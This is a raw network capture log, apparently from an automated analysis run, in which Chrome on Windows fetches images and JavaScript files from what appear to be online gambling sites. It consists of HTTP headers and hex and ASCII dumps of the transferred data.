                                                                                                                                                          2024-06-09 22:41:25 UTC385OUTGET /pc/image-pc/index/312/nav/lottery/lotto03.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 43964
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 16 Jun 2021 07:20:11 GMT
                                                                                                                                                          ETag: "60c9a62b-abbc"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[2],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE12[303],EU-GER-frankfurt-GLOBAL1-CACHE1[0,TCP_HIT,302],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465100
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 1c79361fdd8d26f1d9d8371a4d1a0318
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 7105855
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC15755INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8c 00 00 00 90 08 06 00 00 00 da d4 83 de 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 23 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 33 35 32 2c 20 32 30 32 30 2f 30 31 2f 33 30 2d 31 35 3a 35 30 3a 33 38 20 20
                                                                                                                                                          Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<#iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: 5d 97 ec d6 01 13 d2 35 4a b2 6c 7c 89 ff 33 f5 f0 a1 01 c6 a7 8b d8 d4 bb 76 ef 4f 42 34 f3 9e 74 86 bf 25 2d 93 2f 03 dd d4 70 83 91 4e 66 62 8b 4e ea 09 2c e4 80 58 e7 1c 4a a5 91 9c 98 db 37 ec 8b 1f 3d d2 36 31 38 bc b0 34 30 b1 48 96 94 85 0e af a3 dd d3 50 6d f2 b6 57 43 ac b7 a3 60 e3 21 67 8b e0 22 39 28 05 99 5c 91 81 80 42 6c 62 35 69 cb 9e 19 b2 39 62 16 d2 21 1e 23 22 b1 28 92 85 3c f2 a2 03 ec e9 ae a1 9c 80 03 a3 69 1c 3b 76 0c 9d 87 f7 d3 f7 04 1e 02 9c 4d e2 e1 b0 58 30 7d c6 34 24 52 49 aa 3e 72 41 4e 17 9c 64 b5 1d 0e 37 78 de a2 65 e5 b1 a1 70 96 e6 50 64 13 ad 08 da 6c 44 7b 6c 64 00 c1 81 63 04 89 0c 84 5c 0c b6 40 2d da 2f f9 e2 2b 4d 7e e7 7d 01 8f f2 d2 4a bf 3d e5 16 45 ab 02 d9 21 13 df b0 29 2f 04 30 c6 a0 e6 49 9b 2d 04 68 6b
                                                                                                                                                          Data Ascii: ]5Jl|3vOB4t%-/pNfbN,XJ7=61840HPmWC`!g"9(\Blb5i9b!#"(<i;vMX0}4$RI>rANd7xepPdlD{ldc\@-/+M~}J=E!)/0I-hk
                                                                                                                                                          2024-06-09 22:41:25 UTC11825INData Raw: 0f c5 ff 69 e3 3e f2 b9 0a ee 7d e1 f1 e9 88 a2 8e a5 17 ca a8 68 46 d5 ad 79 6d e1 80 f4 42 b5 68 6e e8 dc da be 27 95 9d 5f 2a 95 f2 9d b9 6c 31 94 5a 29 10 21 d1 c5 6a 3d 49 9b b8 ce 59 90 d3 6d c7 ed 77 dc 86 9d 3b 77 f1 84 d6 b5 d7 ec a1 87 2f 63 8a 28 71 81 58 c1 72 5e c2 4a c6 45 ee d5 8b 3a 3d 8c 95 c5 15 6c 1e da 42 ae 56 e3 07 78 3e f2 1c 7c 64 6b a3 39 7f 85 85 2c 1b 61 05 bf d7 43 60 d2 c0 e1 c9 49 74 f7 0f e0 91 d7 4e 80 c9 e2 08 0d 03 8c 3c 2f d7 04 a4 cb 0d f8 9d 12 2f 7c 66 2d b7 12 63 4b bc 69 fe 5c 40 e2 e9 18 36 eb 8e bc 97 2a 21 58 35 30 77 cf 1f 20 76 d7 e7 b1 76 ef fb b1 78 62 3f 0e ff fd 57 11 e9 5d 0d 5f fb 20 3f ec 03 01 50 86 5b 0c 5a 30 a6 2a 3b 39 3f 0e ab 9a 40 7f 67 3f ca 23 c7 30 ff c0 8f d1 e6 0b c2 24 16 d4 f0 10 86 12 f3
                                                                                                                                                          Data Ascii: i>}hFymBhn'_*l1Z)!j=IYmw;w/c(qXr^JE:=lBVx>|dk9,aC`ItN<//|f-cKi\@6*!X50w vvxb?W]_ ?P[Z0*;9?@g?#0$


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          734192.168.2.55051990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC605OUTGET /pc/image-pc/index/312/nav/card/04.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC630INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 31333
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 22 Feb 2022 09:18:49 GMT
                                                                                                                                                          ETag: "6214aa79-7a65"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[4],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,3],EU-GER-frankfurt-GLOBAL1-CACHE10[311],EU-GER-frankfurt-GLOBAL1-CACHE11[0,TCP_HIT,311],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465097
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 01ee1f319ff43a6d8fbd97b4f6a83dd5
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 7105855
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC15754INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 28 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 62 30 66 38 62 65 39 30 2c 20 32 30 32 31 2f 31 32 2f 31 35 2d 32 31 3a 32 35 3a 31 35
                                                                                                                                                          Data Ascii: PNGIHDRQjtEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15
                                                                                                                                                          2024-06-09 22:41:25 UTC15579INData Raw: 87 18 f2 43 12 33 60 2f ca 40 c7 91 bf 5e 20 3e d8 36 78 fd 9e 87 f7 05 e5 f2 cf bd a5 5b b3 c6 78 55 50 a4 34 ab 20 d4 2e 7b 63 78 ba 49 da 88 cc 58 5e 87 e8 11 63 6d 5b 34 57 be 74 38 a3 60 e4 89 b5 21 8f 2e a0 3c d3 09 43 77 61 79 5a 3a 7f 40 20 27 ca 5e 65 4b ec 3b ed cb 02 0b 67 76 9c 89 70 e4 64 21 f2 ce ed 28 9d 96 85 f4 f2 51 b0 08 a5 98 38 ba 12 ab 5f 78 0a 6b 9e 7f 12 bd 3b 76 23 b3 a0 82 64 32 8f 40 6f 27 22 2d ad f0 fb bb d0 d8 d7 0d 2e 27 0f a3 c7 cf c3 ce 96 6e 8c 2e 3a 78 bf a8 24 49 28 2a 2e 45 8c 88 ae eb 18 e7 dd fa 08 80 9b ac 36 e4 d6 6f 41 a2 74 0c 1c 5e 72 fd 04 66 9f 4f 43 5f a0 d9 ec b8 74 24 54 52 6b f6 23 b5 2c fb c0 02 d7 be 6b e5 46 7b 53 aa 24 37 43 d4 83 49 5b 7c c4 34 2c 98 b4 f8 d4 11 74 30 24 0b db 45 2e 23 57 57 8d 5e c5
                                                                                                                                                          Data Ascii: C3`/@^ >6x[xUP4 .{cxIX^cm[4Wt8`!.<CwayZ:@ '^eK;gvpd!(Q8_xk;v#d2@o'"-.'n.:x$I(*.E6oAt^rfOC_t$TRk#,kF{S$7CI[|4,t0$E.#WW^


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          735192.168.2.550517183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC575OUTGET /061410/rcenter/common/js/bootstrap/bootstrap.js?v=1717580749344 HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC706INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 10933
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-24-04
                                                                                                                                                          ETag: W/"655579c8-b33f"
                                                                                                                                                          Date: Thu, 06 Jun 2024 16:05:37 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:12 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 16:05:37 GMT
                                                                                                                                                          Age: 282948
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-206
                                                                                                                                                          x-link-via: dgct63:443;xymp24:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XY-MP-24-04
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-01
                                                                                                                                                          X-Cdn-Request-ID: e4330e4447b27af4a6cda96dd005325d
                                                                                                                                                          2024-06-09 22:41:25 UTC10933INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 7d 6b 77 db 46 92 e8 f7 fd 15 14 a2 95 89 88 a2 e4 78 72 67 87 34 ac 63 5b 9e 13 df 9b 87 37 56 66 ce bd 5a cd 2c 44 42 16 12 8a e0 10 a0 15 47 e4 fc f6 ad 67 bf d0 a0 24 c7 de 3d d7 e7 58 04 fa 51 5d 5d 5d 5d 55 5d 5d dd 38 fc 72 e7 5f 7a 5f f6 5e 54 55 53 37 cb 7c d1 7b ff 64 f8 64 f8 87 5e ff aa 69 16 a3 c3 c3 77 45 73 a1 79 c3 49 75 9d 62 e9 97 d5 e2 c3 b2 7c 77 d5 f4 be 3a 7a fc f8 00 fe 7c dd 3b bd 29 9b a6 58 0e 7a af e7 93 21 16 fa b6 9c 14 f3 ba 98 f6 56 f3 69 b1 ec 7d f7 fa 94 81 d6 08 b5 6c ae 56 17 08 ef b0 b9 b9 a8 0f 4d 13 87 17 b3 ea e2 f0 3a af 01 d4 e1 b7 af 5f be fa fe ed 2b 6c f2 f0 5f a6 c5 65 39 2f fa 67 c9 cf ff 58 15 cb 0f c9 f9 e0 72 35 9f 34 65 35 ef ff fc ef 98 92 de 96 97 fd e6 c3 a2 a8 2e 7b 9c
                                                                                                                                                          Data Ascii: }kwFxrg4c[7VfZ,DBGg$=XQ]]]]U]]8r_z_^TUS7|{dd^iwEsyIub|w:z|;)Xz!Vi}lVM:_+l_e9/gXr54e5.{


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          736192.168.2.550516183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC580OUTGET /061410/rcenter/common/js/gamebox/common/ClassTool.js?v=1717580749344 HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC657INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 734
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-210-03
                                                                                                                                                          ETag: "655579c8-2de"
                                                                                                                                                          Date: Thu, 06 Jun 2024 16:05:37 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:12 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 16:05:37 GMT
                                                                                                                                                          Age: 282948
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;xymp210:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XY-MP-210-03
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-21
                                                                                                                                                          X-Cdn-Request-ID: 47bd478b0a24aa05cd11053b6a7a1f30
                                                                                                                                                          2024-06-09 22:41:25 UTC734INData Raw: 64 65 66 69 6e 65 28 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 6e 69 74 69 61 6c 69 7a 69 6e 67 3d 66 61 6c 73 65 2c 66 6e 54 65 73 74 3d 2f 78 79 7a 2f 2e 74 65 73 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 78 79 7a 7d 29 3f 2f 5c 62 5f 73 75 70 65 72 5c 62 2f 3a 2f 2e 2a 2f 3b 74 68 69 73 2e 43 6c 61 73 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 43 6c 61 73 73 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 70 72 6f 70 29 7b 76 61 72 20 5f 73 75 70 65 72 3d 74 68 69 73 2e 70 72 6f 74 6f 74 79 70 65 3b 69 6e 69 74 69 61 6c 69 7a 69 6e 67 3d 74 72 75 65 3b 76 61 72 20 70 72 6f 74 6f 74 79 70 65 3d 6e 65 77 20 74 68 69 73 28 29 3b 69 6e 69 74 69 61 6c 69 7a 69 6e 67 3d 66 61 6c 73 65 3b 66 6f 72 28 76 61 72 20 6e 61 6d 65 20 69 6e 20 70 72
                                                                                                                                                          Data Ascii: define([],function(){var initializing=false,fnTest=/xyz/.test(function(){xyz})?/\b_super\b/:/.*/;this.Class=function(){};Class.extend=function(prop){var _super=this.prototype;initializing=true;var prototype=new this();initializing=false;for(var name in pr


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          737192.168.2.550515183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC663OUTGET /061410/rcenter/common/images/errors/blue-bg.jpg HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://brhrjf.yuhu06.xyz/061410/rcenter/common/themes/error.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC633INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 50894
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-HUZ-MP-04-01
                                                                                                                                                          ETag: "633d510e-c6ce"
                                                                                                                                                          Date: Thu, 06 Jun 2024 11:51:57 GMT
                                                                                                                                                          Last-Modified: Wed, 05 Oct 2022 09:40:30 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 11:51:57 GMT
                                                                                                                                                          Age: 298168
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-206
                                                                                                                                                          x-link-via: dgct63:443;huzmp04:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-HUZ-MP-04-01
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-01
                                                                                                                                                          X-Cdn-Request-ID: a08e0af5fd8bffeea8c289f8ee1fd6f4
                                                                                                                                                          2024-06-09 22:41:25 UTC15751INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02 02 02 02 02 02 02 02 02 02 02 03 03 03 03 03 03 03 03 03 03 01 01 01 01 01 01 01 02 01 01 02 02 02 01 02 02 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 ff c0 00 11 08 02 55 04 b0 03 01 11 00 02 11 01 03 11 01 ff c4 00 a0 00 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 03 02 04 09 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 01
                                                                                                                                                          Data Ascii: JFIFddDuckydAdobedU
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: d9 d2 39 ed 71 10 bd c2 2f 58 e1 79 73 b6 75 8e 1b 57 3d ce ac eb 1c f6 e9 1c de e3 36 72 e3 6f 77 3d ce 0e 92 38 ef e8 e5 b9 9d 63 8e d5 0f 71 e8 74 d6 39 6c e7 bd c2 67 58 f3 7c 97 a3 8d b2 a3 cf b5 42 f6 74 d5 ca de 8e 7b b2 67 48 e3 b3 9a e6 75 8e 5b d4 6f 79 f0 3a 6a e3 5c f7 33 79 ae 7b de ce 7b 9c 97 1c ef 09 5c 5c 70 dd 0b dd 7a 1d 23 9d 4d 96 e7 5c f7 3a e3 19 9d 27 0e 69 b1 5c ea 17 bd 0a d5 15 26 54 46 cc 5d 8e f2 a3 8e d7 d1 1b b1 d0 e9 0d b8 49 96 f3 d6 59 a9 a9 37 8e 15 45 46 76 4d 97 11 b5 64 d4 13 09 ac 99 52 cd cf bb b7 35 96 33 32 09 32 c2 0c 06 b1 96 11 48 d4 91 ac 00 2f 30 32 e9 33 be 7b 71 87 a1 ac 4f e9 8e f2 83 6f eb d6 06 06 b4 df 5c ba 68 f8 54 c1 b4 4b 4c 00 00 c0 c2 a3 48 c5 43 31 66 1a d5 b9 ac b3 f1 46 51 44 48 d1 43 41 70 cc
                                                                                                                                                          Data Ascii: 9q/XysuW=6row=8cqt9lgX|Bt{gHu[oy:j\3y{{\\pz#M\:'i\&TF]IY7EFvMdR5322H/023{qOo\hTKLHC1fFQDHCAp
                                                                                                                                                          2024-06-09 22:41:26 UTC16384INData Raw: db 7c 62 3e be 06 55 eb b7 5c c7 45 b7 a7 97 81 36 3b 6b bc ff 00 35 13 27 0e d3 65 ad bf 24 f1 d4 8b aa e5 f7 55 32 2c 5c ad ab 9a 26 c7 4c e7 95 6d bc 8b aa a5 b3 ec a2 64 e1 d2 6d 14 57 c1 36 7a 2f 3e ea ab cc 57 95 8a 2b 87 2b 9b 28 af 68 9f 15 cb 1b 57 a2 7c 5b 2b 6a e3 30 a9 b3 4a e2 70 a9 bd 6d 5e cc f1 57 94 ad 2b c9 f1 56 7d 2b 6a f4 66 1b 9a 6a e4 f5 33 0d f2 bd da 93 30 a9 b5 c1 fa 86 1b e7 4f d4 66 15 e6 3d 43 07 99 fa 86 1b e7 07 a9 0c 1e 70 fd 5c 5f 69 98 6f 9c 2f 50 c3 3c e0 f5 1b 83 ce 17 a8 61 9e 63 d4 30 79 97 a8 61 9e 63 d4 6e 19 77 a5 23 09 f2 67 d4 8d c3 32 cb bc df 16 66 b1 eb 2b c5 36 c6 1d cc ac 33 cf 1c 32 df 13 70 8b b5 61 de 8d c2 73 58 77 c9 53 56 66 77 61 dc 56 13 76 61 dc 91 a8 bb fa 24 fd c1 8b fe 48 b7 d5 27 73 dc ac 26 d6
                                                                                                                                                          Data Ascii: |b>U\E6;k5'e$U2,\&LmdmW6z/>W++(hW|[+j0Jpm^W+V}+jfj30Of=Cp\_io/P<ac0yacnw#g2f+632pasXwSVfwaVva$H's&
                                                                                                                                                          2024-06-09 22:41:26 UTC2375INData Raw: 32 64 0c c6 11 99 04 8c 85 35 4b 73 3b 0c bb b6 c6 53 c9 a1 80 bd 5d 95 c6 91 43 70 17 ab 96 27 35 55 a9 b8 0b 1f 4e 60 23 40 02 0c 00 01 99 23 59 90 18 41 80 d6 64 83 00 2d 20 c0 68 00 00 4f 1e 20 1d fd 21 65 b8 61 4a 9c f9 d4 dc 0c b6 f2 95 cb 9e 55 ef 36 40 9f 0a c4 bd 1c 2c b9 54 d0 9d 7a f1 c4 66 20 40 06 80 00 00 00 00 04 18 03 08 1d c1 ac 01 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 0d 00 86 63 72 03 40 0c 34 00 00 00 00 00 00 00 6b d7 a1 83 49 f7 65 45 b3 dd 6a 30 1a 74 eb ad 52 8d b5 93 30 04 e9 e5 bd 23 c5 01 ac fa a7 5a c5 7b 8c 02 73 be 7a f0 59 3d 85 1a 31 a0 00 00 00 00 c3 26 1b 90 1a 66 36 00 d3 06 4c 28 18 64 06 e4 c0 03 44 bc 63 88 04 cf 5c d8 1a 4f c3 39 e1 a5
                                                                                                                                                          Data Ascii: 2d5Ks;S]Cp'5UN`#@#YAd- hO !eaJU6@,Tzf @cr@4kIeEj0tR0#Z{szY=1&f6L(dDc\O9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          738192.168.2.55052190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC605OUTGET /pc/image-pc/index/312/nav/card/05.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
